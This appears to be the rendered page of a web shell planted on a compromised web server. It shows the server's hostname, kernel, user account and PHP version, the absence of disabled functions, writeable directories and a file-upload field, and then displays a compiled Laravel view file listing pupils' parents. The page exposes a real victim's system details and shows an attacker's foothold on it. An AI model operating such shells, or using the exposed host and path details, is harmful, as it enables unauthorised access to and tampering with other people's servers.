Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/pragmaclasse_recette/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/pragmaclasse_recette/storage/framework/views/2a8f78f29e1d0d19d670874341d1ad4208b6fa32.php
<div class="parent-list-container bg-info text-white">
    <div v-if="listPupils.length>0">
        <h3>
            <span>Mode édition <toggle-button v-model="editing" v-if="classProp.manager" :labels="{checked: 'Oui', unchecked: 'Non'}" /></span>
        </h3>
        <div class="parent-container">
            <parent-single :pupil-prop="pupil" :all-levels="allLevels" :class-prop="classProp" :editing="editing" v-for="pupil in listPupils"></parent-single>
        </div>
    </div>
    <div v-else class="no-parent">
        Il n'y a aucun parent
    </div>
</div><?php /**PATH /home/pragmatice/pragmaclasse_recette/resources/views/components/parent/parentList.blade.php ENDPATH**/ ?>

SAMX